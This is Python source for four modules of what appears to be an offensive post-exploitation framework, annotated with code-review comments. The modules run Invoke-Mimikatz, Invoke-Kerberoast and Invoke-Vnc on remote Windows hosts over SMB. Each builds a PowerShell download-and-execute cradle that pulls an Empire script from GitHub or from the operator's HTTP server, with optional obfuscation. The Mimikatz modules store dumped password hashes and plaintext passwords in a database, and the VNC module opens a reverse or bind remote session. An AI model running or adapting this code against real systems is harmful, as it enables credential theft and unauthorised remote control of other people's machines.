def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run the Invoke-Mimikatz module against one host and record what comes back.

    Flow as written: pick where the PS1 script is served from, wrap the
    Mimikatz command (self.args['COMMAND']) in a PowerShell cradle, execute it
    over the SMB connection, parse the returned text for credentials, push
    them into smb_con.db, and write the raw output to a file in the workspace.

    Args:
        target: host identifier; only used here for logging and the output file name.
        args: parsed CLI options. NOTE: args.timeout is overwritten in place
            (setattr below) and is never restored, so the bumped value leaks
            into whatever runs after this module on the same args object.
        smb_con: established SMB connection wrapper (host, ip, os, db are read).
        loggers: dict of loggers; only loggers['console'] is used.
        config_obj: passed straight through to code_execution.

    Returns:
        None. Failures are reported on the console logger, not raised.
    """
    logger = loggers['console']
    timeout = args.timeout
    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
    try:
        # Define Script Source.
        # Fileless mode serves the script from this operator host over plain HTTP;
        # otherwise the target is pointed at a third-party GitHub raw URL. Neither
        # path pins a version or verifies a hash, so whatever that URL serves at
        # run time is what executes on the target.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
            setattr(args, 'timeout', timeout + 60)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
            setattr(args, 'timeout', timeout + 25)
        logger.debug('Script source: {}'.format(script_location))
        # Setup PS1 Script.
        # COMMAND value is interpolated into the PowerShell string verbatim (no
        # quoting/escaping), so a value containing a double quote breaks the
        # command; it comes from the module's own arg table, not from the target.
        cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
        launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
        try:
            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
            results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
            # Display Output
            # An empty/None result is treated as a failure and ends the module
            # before any parsing or file write happens.
            if not results:
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
                return
            elif args.debug:
                for line in results.splitlines():
                    loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])
            # Parse results and send creds to db.
            # parse_mimikatz yields tuples; from the indexing here the layout
            # appears to be (kind, domain, user, secret) -- confirm against parse_mimikatz.
            # 'hash' stores the secret in the hash column, 'plaintext' in the
            # password column; any other kind is silently skipped.
            db_updates = 0
            for cred in self.parse_mimikatz(results):
                if cred[0] == "hash":
                    smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                    loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
                    db_updates += 1
                elif cred[0] == "plaintext":
                    smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                    loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
                    db_updates += 1
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
            # write results to file.
            # The full raw output -- including any recovered secrets -- is persisted
            # unencrypted under args.workspace (assumes setup_file_logger writes to
            # a file there; confirm). Treat that directory as sensitive.
            file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
            tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
            tmp_logger.info(results)
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
        except Exception as e:
            # Matching on the exception text is brittle: it is meant to catch an
            # IndexError from parsing unexpected output, but any IndexError with
            # that message (and no other) is reported as "<module> failed".
            if str(e) == "list index out of range":
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
            else:
                loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
    except Exception as e:
        # Errors in the setup stage (script selection, cradle generation) are
        # only visible at debug level.
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run the Invoke-Kerberoast module against one host and save its output.

    Flow as written: choose the script source, build a PowerShell cradle with
    no extra command, execute it over SMB, echo every output line to the
    console, and write the raw output to a file in the workspace. Nothing is
    parsed or pushed to the database by this module.

    Args:
        target: host identifier; used only for logging and the output file name.
        args: parsed CLI options. NOTE: args.timeout is overwritten in place
            and never restored.
        smb_con: established SMB connection wrapper (host, ip, os are read).
        loggers: dict of loggers; only loggers['console'] is used.
        config_obj: passed straight through to code_execution.

    Returns:
        None. Any exception is logged at debug level and swallowed.
    """
    logger = loggers['console']
    timeout = args.timeout
    loggers['console'].info([
        smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Kerberoast'
    ])
    try:
        # Define Script Source.
        # Fileless mode serves from this host over plain HTTP; otherwise the
        # target fetches from a third-party GitHub raw URL. No version pin and
        # no integrity check on either path.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(
                srv_addr)
            setattr(args, 'timeout', timeout + 30)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
            setattr(args, 'timeout', timeout + 15)
        logger.debug('Script source: {}'.format(script_location))
        # Setup PS1 Script (empty trailing command: the script runs as-is)
        launcher = powershell.gen_ps_iex_cradle(script_location, '')
        # Execute
        cmd = powershell.create_ps_command(launcher, loggers['console'],
                                           force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
        x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
        # Display Output.
        # Unlike the Mimikatz run() on this page there is no guard for an empty
        # or None result; if code_execution returns None, splitlines raises and
        # the failure is only reported at debug level by the handler below.
        for line in x.splitlines():
            loggers['console'].success(
                [smb_con.host, smb_con.ip, self.name.upper(), line])
        # write results to file.
        # Raw output is persisted unencrypted under args.workspace (assumes
        # setup_file_logger writes a file there; confirm).
        file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
        tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
        tmp_logger.info(x)
        loggers['console'].info([
            smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)
        ])
    except Exception as e:
        # Every failure in this module is debug-only; nothing surfaces at
        # normal verbosity.
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run the Invoke-Vnc module against one host.

    Flow as written: choose the script source, build the Invoke-Vnc command
    from the module's CONTYPE/IPADDRESS/PORT/PASSWORD args, wrap it in a
    PowerShell cradle, execute it over SMB and echo the output.

    Args:
        target: host identifier; used only for logging.
        args: parsed CLI options. NOTE: args.timeout is overwritten in place
            and never restored.
        smb_con: established SMB connection wrapper (host, ip, os are read).
        loggers: dict of loggers; only loggers['console'] is used.
        config_obj: passed straight through to code_execution.

    Returns:
        None. An invalid CONTYPE calls exit(1), which terminates the whole
        process (SystemExit is not caught by the except Exception below).
    """
    cmd = ''
    logger = loggers['console']
    timeout = args.timeout
    loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
    try:
        # Define Script Source.
        # Fileless mode serves from this host over plain HTTP; otherwise the
        # target fetches from a third-party GitHub raw URL. No version pin and
        # no integrity check on either path.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
            setattr(args, 'timeout', timeout + 30)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
            setattr(args, 'timeout', timeout + 15)
        logger.debug('Script source: {}'.format(script_location))
        # Setup PS1 Script.
        # Arg values are interpolated into the PowerShell string verbatim (no
        # quoting), and PASSWORD ends up in the command line that is logged at
        # debug level / sent to the target. Values come from the module's own
        # arg table, not from the target.
        if self.args['CONTYPE']['Value'] == 'reverse':
            # Reverse mode with no IPADDRESS defaults to this host's local IP;
            # this mutates self.args, so the default persists for later runs.
            if not self.args['IPADDRESS']['Value']:
                self.args['IPADDRESS']['Value'] = get_local_ip()
            cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
        elif self.args['CONTYPE']['Value'] == 'bind':
            cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
        else:
            # Reported via .success() even though it is an error, then the
            # process exits -- not just this module.
            loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
            exit(1)
        launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
        # Execute
        cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
        x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
        # Display Output.
        # Relies on code_execution returning a str that starts with
        # 'Code execution failed' on error (assumed from this check; confirm).
        # A None return would raise here and only be logged at debug level.
        if not x.startswith('Code execution failed'):
            for line in x.splitlines():
                loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
        else:
            # The message is misleading: this branch is the failure case, not
            # a silent success.
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"])
    except Exception as e:
        logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj) -> None:
    """Run Invoke-Mimikatz against one host and push parsed credentials to the db.

    Second variant of the Mimikatz module on this page. Differences from the
    other one, as visible here: create_ps_command is called with obfs= rather
    than no_obfs=, code_execution receives cmd as a keyword argument, every
    output line is echoed at success level, there is no empty-result guard,
    and the raw output is not written to a file.

    Args:
        target: host identifier; used only for logging.
        args: parsed CLI options. NOTE: args.timeout is overwritten in place
            (+10) and never restored.
        smb_con: established SMB connection wrapper (host, ip, os, db are read).
        loggers: dict of loggers; only loggers['console'] is used.
        config_obj: passed straight through to code_execution.

    Returns:
        None. Execution errors are logged at debug level and swallowed.
    """
    logger = loggers['console']
    try:
        # Get script:
        # Fileless mode serves from this host over plain HTTP; otherwise the
        # target fetches from a third-party GitHub raw URL. No version pin and
        # no integrity check on either path.
        if args.fileless:
            srv_addr = get_local_ip()
            script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
        else:
            script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
        logger.debug('Fetching script from {}'.format(script_location))
        # Setup
        timeout = args.timeout
        setattr(args, 'timeout', timeout+10) # Modify timeout to allow execution time
        # COMMAND value is interpolated verbatim (no quoting); a double quote in
        # it breaks the command. It comes from the module's own arg table.
        cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
        launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
        try:
            # Execute
            cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os)
            loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
            x = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True)
            # Display Output.
            # No None/empty guard: if code_execution returns None, splitlines
            # raises and the inner handler logs it at debug level only.
            for line in x.splitlines():
                loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])
            # Parse results and send creds to db.
            # From the indexing, parse_mimikatz tuples look like
            # (kind, domain, user, secret) -- confirm against parse_mimikatz.
            # 'hash' goes to the hash column, 'plaintext' to the password
            # column; any other kind is skipped without a message.
            db_updates = 0
            for cred in self.parse_mimikatz(x):
                if cred[0] == "hash":
                    smb_con.db.update_user(cred[2], '', cred[1], cred[3])
                    db_updates += 1
                elif cred[0] == "plaintext":
                    smb_con.db.update_user(cred[2], cred[3], cred[1], '')
                    db_updates += 1
            loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
        except Exception as e:
            # Execution/parsing failures are debug-only.
            loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
    except Exception as e:
        # Setup-stage failures (script selection, cradle generation) are debug-only.
        logger.debug("{} Error: {}".format(self.name, str(e)))